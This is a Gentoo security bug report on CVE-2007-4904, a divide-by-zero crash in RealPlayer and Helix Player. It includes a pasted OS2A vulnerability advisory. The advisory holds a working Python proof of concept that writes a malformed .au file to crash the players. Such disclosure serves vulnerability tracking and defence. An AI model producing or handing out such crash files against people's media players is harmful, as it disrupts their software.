| Summary: | media-video/realplayer: .au Divide-By-Zero Denial of Service Vulnerability (CVE-2007-4904) | ||
|---|---|---|---|
| Product: | Gentoo Security | Reporter: | Tobias Heinlein (RETIRED) <keytoaster> |
| Component: | Vulnerabilities | Assignee: | Gentoo Security <security> |
| Status: | RESOLVED INVALID | ||
| Severity: | minor | CC: | dyek, media-video |
| Priority: | High | ||
| Version: | unspecified | ||
| Hardware: | All | ||
| OS: | Linux | ||
| URL: | http://www.securityfocus.com/bid/25627 | ||
| Whiteboard: | B3 [upstream+] | ||
| Package list: | Runtime testing required: | --- | |
This is CVE-2007-4904. still no news from upstream? :/ I'm told this bug is actually fixed in the nightly snaps.. Helix team decided that this divide-by-zero bug is not a security bug. This bug has already been fixed in RealPlayer nightly build available here: http://forms.helixcommunity.org/helix/builds/?category=realplay-current http://forms.helixcommunity.org/helix/builds/ (Use only linux-2.2-libc6-gcc32-i586@rhel4 bin or package. AMD64 builds aren't ready for use yet.) The nightly-build typically works better than the released RealPlayer. Thanks. Denial of Service within a user/client application is not considered a security vulnerability. Thanks for getting back to us, Daniel. |
RealPlayer/HelixPlayer .au Divide-By-Zero Denial of Service Vulnerability OS2A ID: OS2A_1010 08/21/2007 Issue Discovered 08/31/2007 Vendor Notification Class: Denial of Service Severity: High Overview: ------------- RealPlayer/Helix Player is a media player that will play popular media formats as well as organize your music and videos. Description: -------------- A Denial of Service flaw exists in RealPlayer and HelixPlayer, when a user tries to open a malformed .au file. The flaw is due to a Division by Zero error when processing a malformed AU file. An attacker must entice an unsuspecting user to open a maliciously crafted AU file. Impact: -------- Successful exploitation allows an attacker to crash a vulnerable application via a specially crafted file. (Deny the service). Affected Software(s): --------------------- Realplayer 10.1.0.3114 and prior Helixplayer Tested on : - RealPlayer-10.1.0.3114 - Realplayer-10.0.9 - Realplayer-10.0.8 on FC6, RH9, RHEL and SuSE respectively - Realplayer10-5Gold on Windows XP - HelixPlayer-1.0.6.778 on FC6 AV MP3 Player and Media Player Classic are also found to be vulnerable Affected Platform: ------------------ Microsoft Windows (All Platform) RedHat Linux Fedora Core Linux SuSE Linux Proof of Concept: ------------------ The following Python program will generate a malformed .au file import sys import os head = ("\x2E\x73\x6E\x64\x00\x00\x01\x18\x02\x01\x42\xDC\x00\x00\x00\x01"+ "\x02\x02\x1F\x40\x00\x00\x00\x00\x00" + "\x31\x00\x00\x00\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x66\x66\x66\x00") print "[x] RealPlayer/Helix Player/Kaboodle Player DoS" try: f = open("exploit.au",'w') except IOError, e: print "Unable to open file ", e sys.exit(0) print "[x] File successfully opened for writing." try: f.write(head) except IOError, e: print "Unable to write to file ", e sys.exit(0) print "[x] File successfully written." f.close() print "[x] Open exploit.au with RealPlayer/Helix/Kaboodle Players." #End of program RealPlayer crashes with the following exception, Floating point exception$REALPLAYBIN "$@" CVSS Score Report: ------------------ ACCESS_VECTOR = NETWORK ACCESS_COMPLEXITY = MEDIUM AUTHENTICATION = NOT_REQUIRED CONFIDENTIALITY_IMPACT = NONE INTEGRITY_IMPACT = NONE AVAILABILITY_IMPACT = COMPLETE EXPLOITABILITY = PROOF_OF_CONCEPT REMEDIATION_LEVEL = UNAVAILABLE REPORT_CONFIDENCE = CONFIRMED CVSS Base Score = 7.1 (AV:N/AC:M/Au:NR/C:N/I:N/A:C) CVSS Temporal Score = 6.4 Risk factor = High Reference: ----------- A similar attack was found recently against Windows Media Player, http://www.safehack.com/exp/mp/mplayer11.txt Solution/Work Around: -------------------- Do not open untrusted .au files. Credits: -------- Nagendra Kumar G, Chandan S and Arun Kethipelly of OS2A have been credited with the discovery of this vulnerability.